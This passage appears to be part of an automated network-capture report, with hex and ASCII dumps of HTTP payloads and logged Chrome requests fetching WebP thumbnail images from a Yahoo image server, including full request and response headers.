                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: ac 16 ad 2b 52 34 1e d4 8a d6 a0 8f 55 78 5f 0d 56 ad 2c be 1d 01 43 0a b1 49 f8 ef 43 bd d7 c7 4c e3 3e 33 d2 52 5d fc e1 8e a0 8e 02 c9 ed 8e cd b5 df 20 c6 9f 16 7d cc d6 53 7e 39 1b f4 5c 00 28 ef 50 7c 0d e9 79 d3 e1 30 aa af 64 1e af 06 aa 00 1a fb 59 e1 97 a9 dc 8a f7 c1 e2 ba 7c 2e 6b a0 b2 a7 2e 70 d0 98 e1 ed fd b3 24 12 36 37 4e 9e bc 5e 7a d8 b6 5c f2 64 e2 e5 1d d7 ee 9a bb 8a 33 d1 21 f4 55 3f 94 f3 cb 0b 87 fb e1 ec ef 49 45 34 8b 5e 3c c3 e8 d7 0c f0 6a cc f1 31 82 d2 f8 07 69 9d ef 61 74 23 db 08 04 ff 0e 1f 66 8f 4a 6a ba 76 9a 9d d0 5f bf 68 20 65 59 b1 5e 79 47 1e a1 47 7e 5d 7b 27 1c 96 55 a8 ed c6 5d 3a b0 f5 61 a1 23 ec 31 11 31 6c 5d 83 54 b4 e4 bd cc b6 bb 00 d8 c0 11 69 7b f0 09 f9 d8 24 58 bb 9e 72 c6 e6 49 61 e3 a3 71 b7 ab 17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: +R4Ux_V,CICL>3R] }S~9\(P|y0dY|.k.p$67N^z\d3!U?IE4^<j1iat#fJjv_h eY^yGG~]{'U]:a#11l]Ti{$XrIaq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: da f9 e6 ef ac 0b ad 98 d3 ab 0f d8 cd 09 e6 de 1c 06 55 3b ac 26 96 44 2b 57 8d 65 7f c7 26 1d d8 4f 28 17 2b 74 3d 83 5d f1 9b dc ce c1 03 47 d0 57 f7 a1 16 38 39 69 91 0d 65 81 b1 5d 32 4e bc 13 c3 bc e6 48 2a 87 1b 46 d6 8a ac 36 53 dd 7a 98 0a 7f 5e bf f3 ec d9 22 30 13 73 38 69 b2 58 0c 25 37 02 ed 94 ab 34 5a ed 47 83 b1 15 c1 ba 30 45 24 12 c1 e6 13 98 bf c8 40 b7 cc ba 9a eb 84 d8 97 61 80 1d f4 77 30 c1 62 6b e5 e7 40 08 34 b7 82 c5 09 53 d0 6c 70 da f6 91 75 43 13 9c 41 02 2b 2f 58 4f cc f6 17 f8 f4 65 45 27 b8 6b 86 fd dd 58 03 8e a9 d9 78 d4 bb c5 28 f0 a4 a7 94 30 e2 4b 7c e1 0a a9 96 cd 54 c5 0d 11 6f fb b4 2d 60 86 9f 41 f2 6a 00 2d 0a 0c b4 eb 73 04 06 30 79 40 d0 f0 d6 4b 17 b3 b4 3f 49 3e 61 84 2c c8 23 22 b5 c0 91 62 9e 41 14 97 60 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: U;&D+We&O(+t=]GW89ie]2NH*F6Sz^"0s8iX%74ZG0E$@aw0bk@4SlpuCA+/XOeE'kXx(0K|To-`Aj-s0y@K?I>a,#"bA`
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: df b8 eb 61 33 6a 50 a2 5d f8 21 27 cc 36 2e a2 c1 d7 99 e8 1b 42 78 b9 b2 a3 a0 84 83 eb e5 59 45 cb bb c3 4f a8 11 23 b9 bd 26 77 0a 44 8b 76 20 a3 46 e2 02 99 41 47 55 98 4a fe 34 68 46 0d ac 28 30 19 7c 5f 97 83 19 31 52 09 1f 2e fe cf 7e 24 d3 ad e4 fb b9 69 9e d8 82 44 96 fd 0e 57 12 0d 0c f1 a8 1b 7e 3d ac 8d ad 65 35 69 e0 1a 56 cb 8c a8 98 54 ed 0e 4d a7 5d c6 cc a5 73 9a 9a 63 f4 45 63 0f ab 71 62 3a bb 91 2b 1c 91 36 6f 0f 4f e3 bb 76 a0 27 86 75 78 3a c2 31 ea 43 b3 34 83 a6 6f 3a 1c 72 ae fb 64 af 8c 01 39 43 ff 3c 9f 5f 0e ff a3 22 98 e4 6f e7 1d 24 9b 24 44 ad 67 bd 55 72 b0 1c 49 2e 9e 1f f2 58 9e a4 6b 47 18 a9 4c b2 79 65 9b 98 07 ee de 5f 64 ba c1 f9 57 83 43 e9 cc e8 24 9e 3b 0f cd cb 7d 25 4d 0b 3e 4d 43 2b 66 b1 48 c7 ea 17 a0 46 1c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: a3jP]!'6.BxYEO#&wDv FAGUJ4hF(0|_1R.~$iDW~=e5iVTM]scEcqb:+6oOv'ux:1C4o:rd9C<_"o$$DgUrI.XkGLye_dWC$;}%M>MC+fHF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC120INData Raw: 97 05 7e f3 ed 1e 54 18 10 94 8c 6e 5b 9b d1 94 e1 ee 0b 6d c0 3c e2 ea fc a9 68 81 e2 ba ed 5e f7 aa 80 63 45 2e cc 1b 60 eb d8 70 53 a8 bf 2e 26 8c 00 f2 9c 26 7b ad 6f f9 f4 5b f5 85 3a 08 86 bc 6e 88 96 45 cc ee 73 30 4c b0 2b 6a 91 d7 33 46 de fb ac 17 60 5b 83 30 d3 bb 07 c6 5a ca fe eb a4 b3 ad c8 00 4a 10 df a2 7f 59 dc 53 03 cb f6 ac 67 c0 00 00 00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ~Tn[m<h^cE.`pS.&&{o[:nEs0L+j3F`[0ZJYSg


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    51192.168.2.44981087.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC752OUTGET /uu/api/res/1.2/D1cC99bQYm9QVoUbD_Rpnw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_tech_153/03d01cbdd7ccafd738da286245b9f503.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1111INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 20956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="03d01cbdd7ccafd738da286245b9f503.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "574408d007bdd73aac2a0c0e764ecd69"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Expiration: expiry-date="Sun, 30 Mar 2025 00:00:00 GMT", rule-id="delete fetch for mysterio after 180 days"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 15:55:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 16:01:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=1;cpu=0;start=2024-09-30T16:01:54.783Z;desc=hit,rtt;dur=90,content-info;desc="width=356,height=180,bytes=20956,owidth=3840,oheight=2160,obytes=1074982,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-request-id: aca85be4a1f7b44fccfec65cc861e43e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 4743
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 52 49 46 46 d4 51 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 20 00 00 00 63 01 00 b3 00 00 49 43 43 50 0c 02 00 00 00 00 02 0c 6c 63 6d 73 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 dc 00 01 00 19 00 03 00 29 00 39 61 63 73 70 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 6c 63 6d 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 5e 63 70 72 74 00 00 01 5c 00 00 00 0b 77 74 70 74 00 00 01 68 00 00 00 14 62 6b 70 74 00 00 01 7c 00 00 00 14 72 58 59 5a 00 00 01 90 00 00 00 14 67 58 59 5a 00 00 01 a4 00 00 00 14 62 58 59 5a 00 00 01 b8 00 00 00 14 72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: RIFFQWEBPVP8X cICCPlcmsmntrRGB XYZ )9acspAPPL-lcmsdesc^cprt\wtpthbkpt|rXYZgXYZbXYZr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 97 d1 be aa 16 98 db ab 5a 7b 55 1d 07 7c 05 7c 9e 48 c1 19 38 30 05 2d 8b 3d 6f bb 30 7c 19 51 2e cc e8 1f 37 a7 55 84 d3 e5 7b 4f f7 8c f8 b6 f2 16 5e 08 82 a5 8c 7d 23 6a 90 e4 a8 a1 9e 39 d7 4c f0 ee 6a c4 f7 d2 f3 23 55 2a 3f fe 04 81 84 8f f3 ca 5c 92 44 99 87 b5 59 10 8e 5b 47 bf e5 ac 33 85 67 a3 ba 0f a6 61 1c 33 c5 6e 1e 79 17 09 06 c8 04 f8 f3 13 30 f8 3d 49 40 50 e0 ff be 71 ea de 3e 7b bb 4e a2 b3 29 e6 71 47 bd 28 cc f6 d2 50 2d c1 46 58 e3 f9 10 db 4e 16 f6 1a 8b 57 87 a5 4c 34 c6 7c a8 82 cf e8 76 30 32 23 f8 63 0f 41 2f c4 ad 56 d3 48 d4 ff 63 f2 55 63 eb b3 9a a8 ee c4 c8 6e 96 04 87 45 5a ac 0d fd c2 fb a6 34 44 df 7d 98 0d fe a0 ab 7e 54 ef 65 f6 5e 1d 5e 5e ea 1e 0f 13 f7 8d 11 af cb 1d d1 a9 17 c7 4d 8c 67 7a d6 98 00 d3 0b e6 fb 92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Z{U||H80-=o0|Q.7U{O^}#j9Lj#U*?\DY[G3ga3ny0=I@Pq>{N)qG(P-FXNWL4|v02#cA/VHcUcnEZ4D}~Te^^^Mgz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: b2 f5 e4 55 c3 f1 a2 ec 5a 69 4d 3c 0f 1a 2f 56 76 30 a1 e5 87 fe ec 23 1d 3d b2 df 62 aa a5 3c d4 e0 07 15 d9 df bd 8b 21 f7 42 4b 3a 8e 79 d1 d5 08 8e e2 0c c9 ab 61 cd ef 32 c6 2d 1f f0 ed 40 0a ea c0 1f 6b 75 57 dd 5d 95 9c cc c1 bc 2c 3e 0e ec 74 54 e7 02 a1 2f 6d 34 56 f2 6a 4b 19 19 9c da 69 6f 38 92 ae 0a 0c 58 a5 50 9e 66 55 28 96 b4 ca 4a 6d f3 90 6d 2d 52 3c 31 58 61 e3 3e 92 a2 7c 1b cb f7 00 25 f0 39 f1 52 c2 e9 6a ee 10 65 64 69 27 c1 38 f1 36 9f a4 ed 5e a1 33 0f 7c dd d9 89 4d fe c6 f3 0a 3e d3 1c d5 e6 e2 ce 12 f8 cd ef 51 bb a8 76 ce 33 f4 0f cc 7a 74 fb 38 5b b1 53 56 dd ef 8e c4 42 17 8c d4 9a 5d 99 37 1b 35 da bb 81 87 6d 08 30 9c e9 1d e9 4e 92 8e 3e 97 1b 0b c6 05 53 c1 c5 c0 ee 8a 0b 14 a3 e5 26 a9 99 26 ef 13 f3 59 ae 49 56 3e 23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: UZiM</Vv0#=b<!BK:ya2-@kuW],>tT/m4VjKio8XPfU(Jmm-R<1Xa>|%9Rjedi'86^3|M>Qv3zt8[SVB]75m0N>S&&YIV>#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 26 19 9e 91 4b 54 b5 36 3e 52 4b 7c 6a ee 6d 15 2b ec 88 bc ef 5b d5 90 a2 d0 9d 89 8c c2 88 24 66 d2 45 e5 fa 64 d7 7f b2 94 1c 2a 51 79 d5 1b 49 53 b2 b9 0f 6b e7 78 e9 0e 83 ca f1 b3 a6 90 9f 8e b2 92 a9 ab b7 5d d0 2d dd 6e b3 0b 19 0b b8 6e 35 e9 82 cd 0e ca e3 01 04 cc 0e c7 97 2b 64 47 89 47 54 33 3f 6f b1 8d 29 6a b8 2d 81 33 96 4d 81 7e 37 48 36 1c 54 fe b2 f6 94 00 0a c4 ed 82 43 d8 66 e5 dc d1 cf 3b 89 19 18 eb e0 51 92 aa 8f 8a 47 bb c1 dc 6c 4d af 19 24 23 9e 17 a7 dc ca 39 c0 23 de 3d 20 fc ba a0 81 f2 ca 1c 20 54 8b 20 3c c9 e2 28 7a 9e f8 26 67 b6 4a e3 73 cc 1a 5f 1e 45 ad bc 8f fd 54 45 5f e4 8c a1 1c 6e 6e 26 f4 48 5d cf c0 88 e7 5e 93 87 62 c6 6e ae 60 01 ba 74 fc fe c0 b4 c2 0a c8 32 cb 29 99 8f 27 40 93 f3 7d 8d ac 5c 53 2e a2 71 02
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &KT6>RK|jm+[$fEd*QyISkx]-nn5+dGGT3?o)j-3M~7H6TCf;QGlM$#9#= T <(z&gJs_ETE_nn&H]^bn`t2)'@}\S.q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: cf 4e 34 be 59 fb 04 04 97 aa 15 0f f1 a1 20 dc 82 82 ae 66 ac e7 ee 20 04 7c 43 9d ef 37 7e 2a 7e 37 70 1c 3b 54 61 e2 f7 56 04 68 79 69 32 ca 6a 08 5a 84 c1 f9 2c 22 d3 f9 fb 06 5b 18 22 07 ac eb 33 a8 03 ff b6 52 69 e5 41 33 43 e5 9a 16 ed 7b 93 26 cc 89 14 02 90 d4 15 1d 97 eb e9 71 9a 20 1a 4a c5 70 b7 1d b3 2a 8e 82 43 ae 34 af 9d 12 14 c4 d4 5b cd ea 04 ec 87 52 ae 0f 88 4c e2 38 5f 6f be 1d 14 b7 c9 4d 32 63 07 78 d0 53 ff db 25 6f b6 50 cf 43 fe d7 7c 18 a1 7e 28 e0 8d 7b e2 6f 93 fb 70 77 0a ce a6 6d 47 08 d3 53 14 80 e3 bd a5 12 46 c3 f8 a0 17 17 17 9b 3a ab 17 1e 2a 41 57 e0 fa fd 56 57 35 76 17 33 cc 51 6f 95 65 00 ce 4c da 39 f1 69 eb bf ef 12 7d a2 b5 55 78 fd 7e 23 2b 93 ec 84 61 2f bc 8a 89 30 bd 81 7c da 14 bd c1 e8 db e9 fe f1 41 0b 03
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: N4Y f |C7~*~7p;TaVhyi2jZ,"["3RiA3C{&q Jp*C4[RL8_oM2cxS%oPC|~({opwmGSF:*AWVW5v3QoeL9i}Ux~#+a/0|A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 49 5d 69 3b 27 54 cd d2 90 fc c4 2a 64 c1 19 ee d3 b2 78 d1 26 06 68 40 32 2f cc 8d 9b 4c 11 33 80 c7 0e 24 f0 58 be 3f 86 1d 31 1e fa 1c a0 65 d3 1d 0e 8a b1 61 16 4d db 9f 62 f5 a2 34 c6 0b f4 89 65 ba 20 9a b3 b1 34 01 ed 65 de fd 86 09 4d 9c 0f 93 b5 41 92 18 c1 a1 76 8c 13 70 80 46 71 b7 a0 a6 65 c1 95 66 22 ce 02 62 71 d4 c7 c7 de dd be e8 a5 8b b0 ef f6 c6 b7 e7 8b c5 30 35 79 51 68 3f 8a ca f5 c9 9d e5 d7 71 e7 c8 8c ff d4 a9 4e a2 fe 56 eb 02 80 ed 67 c6 6d 86 9a 58 05 05 8c b1 4d 20 9e 71 45 38 99 19 3f 29 a3 b7 9e b2 0a b3 51 1a 16 6c 4a 22 66 fc 7e 04 7a b4 b3 7e af c8 91 c1 b0 43 7d 67 0d 6c 4c 61 eb 40 e3 ba 83 00 9d 13 c0 d7 b7 f0 70 6f 56 21 8c 53 8a 9b 55 e1 ac 1d ad b6 f3 5f a6 14 bb a9 ab b0 93 95 3c 47 7d 66 39 8d 84 00 ee 32 59 31 55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: I]i;'T*dx&h@2/L3$X?1eaMb4e 4eMAvpFqef"bq05yQh?qNVgmXM qE8?)QlJ"f~z~C}glLa@poV!SU_<G}f92Y1U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 6a fd 3d 17 fa e4 aa 57 97 7a 75 8e 15 38 46 f1 81 04 cf 12 b9 ec dd 5e e6 03 0f 03 2b d9 b6 c5 9c ca a0 cd f8 03 e5 11 d6 e2 38 02 9f c0 56 de f1 8c 0d 9a 59 a6 82 b0 55 32 21 67 5f db 30 d4 4f d8 3e 07 1f 09 c8 19 aa 8f 34 19 df ce ab 84 aa e4 92 15 ac 30 dd 5f 73 36 7d db 46 e5 a3 97 18 07 8b eb eb 3f 2c 78 17 59 4d 2e 93 3c b5 c6 d0 07 50 18 93 3b 8e 3c 8f ee 75 90 67 c9 1d f7 bd 28 42 d5 53 ad 23 db 1a e3 2f 37 2e 89 2f 1d 0d b9 fe d3 2b 59 01 79 16 f6 9c 7e 8c 27 15 de 17 66 83 4b 71 4a e4 0b 81 01 c6 d3 68 31 67 15 7e 71 d8 64 40 65 e7 bd 3c 13 98 ce 09 81 f8 7d 6c 42 20 71 7f df 33 63 99 53 3b df 76 5e 86 b2 02 17 43 c7 3e 39 b7 92 a2 11 b9 57 73 08 ef ef 79 06 58 e3 97 e9 cc 11 17 ee a1 95 fa 74 da 9a 60 37 c8 7c f4 d3 e6 7f 1f 13 5c 58 7d 30 13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: j=Wzu8F^+8VYU2!g_0O>40_s6}F?,xYM.<P;<ug(BS#/7./+Yy~'fKqJh1g~qd@e<}lB q3cS;v^C>9WsyXt`7|\X}0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: ef dc ec 92 75 3e a4 f6 64 ff c3 55 0e e8 35 ff a9 8e 8f 86 65 41 f8 38 37 b2 b6 5c 4c e1 3c c9 48 9f b8 a7 b9 e7 44 80 f4 8a 2d 91 65 a9 5d 54 09 fe 9d 78 08 60 23 15 4a 8d 71 8d 52 65 eb 49 9e 20 80 b3 dd 73 b0 54 9b ab eb f0 ac 45 f1 74 96 f4 53 5d ee 67 29 84 57 44 17 d8 de 50 00 03 05 a2 18 77 70 04 36 8c 2b 15 a8 f4 8b d4 36 83 bf 9c 6e c8 7f ae d4 34 7e c5 4f 80 2e d7 c2 23 63 c5 4e 90 56 79 d0 9b 4c 90 6a 5d cc a8 e0 7a a1 35 2f 5f d5 f5 75 2f 3f cb b2 57 b1 e8 29 a8 86 80 df 98 65 04 e9 e4 42 59 5e 77 99 7b ad 2b ef be 4d 33 49 74 57 0b 1b 74 8f 4c c3 0d d0 52 3e 02 6f aa da e9 e0 00 1f 72 30 68 ff bc ba 29 6d bf 99 ac 0d 44 0b 49 5e 8b cf c8 91 2f 51 58 42 0f f4 05 2d f1 70 05 65 e2 2e c8 8e e8 d2 b4 6a 7a 8f 97 3a 5a c9 36 3f 2f a4 e7 08 12 db
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: u>dU5eA87\L<HD-e]Tx`#JqReI sTEtS]g)WDPwp6+6n4~O.#cNVyLj]z5/_u/?W)eBY^w{+M3ItWtLR>or0h)mDI^/QXB-pe.jz:Z6?/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: ca b4 b3 95 40 3c d1 9c 72 7f c0 f0 be 0a ac f2 0c a2 ca f4 1a 69 39 6e e0 06 1d 8b dd 4a aa e8 b4 44 5c 04 cd 72 69 b4 00 3a f8 dd 48 0b c1 5f 88 00 f2 84 c0 f7 7f ea 39 d8 9e bf 7b f1 5a 40 59 a1 1e 19 71 30 50 07 8c 47 52 8d e2 72 6e 1a 45 2b da 00 67 aa 82 57 d8 da 87 7f 93 47 ae 37 e4 9f ef 94 eb 76 a8 bf ff 05 c7 bd e5 2a 30 f2 a6 d9 9f a9 33 a5 a5 91 8f 96 1c e5 f4 4b 8a e2 99 4d 1b 48 24 f2 11 da fc a4 54 c7 80 98 db d3 96 81 1c d0 66 9d f3 d0 6a dd b8 16 22 f2 f4 1f 42 78 8b 7c 68 c5 b1 a6 fa 65 9b b9 b9 b1 b3 7b 83 e1 c2 0b d0 fc f5 c9 af 8e 69 90 47 0f 69 12 41 50 7a 35 33 7f 23 eb 61 e1 e3 65 23 93 34 fc 54 56 74 fe c6 1a fb b4 bf 1a d6 f5 0e 6f be 40 41 c5 cf 1c 70 4c 87 82 cf 57 03 66 a5 33 8a 1a f6 9c a0 d3 71 18 83 86 1e 71 7f af 54 d1 d8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: @<ri9nJD\ri:H_9{Z@Yq0PGRrnE+gWG7v*03KMH$Tfj"Bx|he{iGiAPz53#ae#4TVto@ApLWf3qqT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1300INData Raw: 4e 56 fe ef 75 a5 9a ea d0 29 c8 c0 33 e0 64 42 45 0a 8f fe f2 c9 33 5d b9 a8 62 1a ca c9 8a 2f 82 6f e4 5d 97 ff 12 32 2b 5a d4 67 fe 5c 83 d1 89 b2 49 f8 a3 5b 7e 9d 86 f7 72 ef 0c 7e 6d 65 28 93 3a c3 fe ea 7b 60 f9 de e6 3b 47 4a bb 52 44 29 af d2 94 21 ae a2 5e 57 66 50 c2 c6 63 ee 45 cd 19 90 8f cc 57 e9 a1 9f cf 04 d9 5e a5 7f e2 69 ee 47 a3 ac b3 22 3d 8b 01 1c 7c 68 02 5f b7 a3 76 ea 62 f1 9a a5 ba 7f 5b 46 1c 5c 1d 98 00 3e 51 3a c5 51 1d e6 84 ed cb 4a 78 f9 40 f0 71 e5 c1 7f 30 54 43 c0 9f 45 d9 3f 5f a3 43 9f ea 96 7f 75 fd b9 d4 63 a2 99 4c ea bf 13 c4 87 1f 08 4d b7 54 8a 49 de 40 70 a4 c3 2a d3 af 86 b8 3d 95 c8 8f ec 4a 49 11 a3 87 e0 3d 10 08 f2 cb 5f f7 35 be 75 02 12 83 a2 5c bb d0 cf 76 ec 22 c5 c0 b1 6a 77 fd cc bf 9a 8e 2c 06 13 e0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: NVu)3dBE3]b/o]2+Zg\I[~r~me(:{`;GJRD)!^WfPcEW^iG"=|h_vb[F\>Q:QJx@q0TCE?_CucLMTI@p*=JI=_5u\v"jw,


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    52192.168.2.44981287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC763OUTGET /uu/api/res/1.2/EP05qSSZkDRwnsJtEV.Bmw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/84608c70-7f17-11ef-bfc7-ce05e04ea18c.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:20:57 UTC1089INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 11842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Disposition: inline; filename="84608c70-7f17-11ef-bfc7-ce05e04ea18c.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "078e319bebf44a78d00f2b1c413aa3a9"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 30 Sep 2024 10:34:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 11:22:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server-Timing: cld-fastly;mitm=po;dur=1;cpu=0;start=2024-09-30T11:22:24.543Z;desc=hit,rtt;dur=88,content-info;desc="width=356,height=180,bytes=11842,owidth=2027,oheight=1141,obytes=242445,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
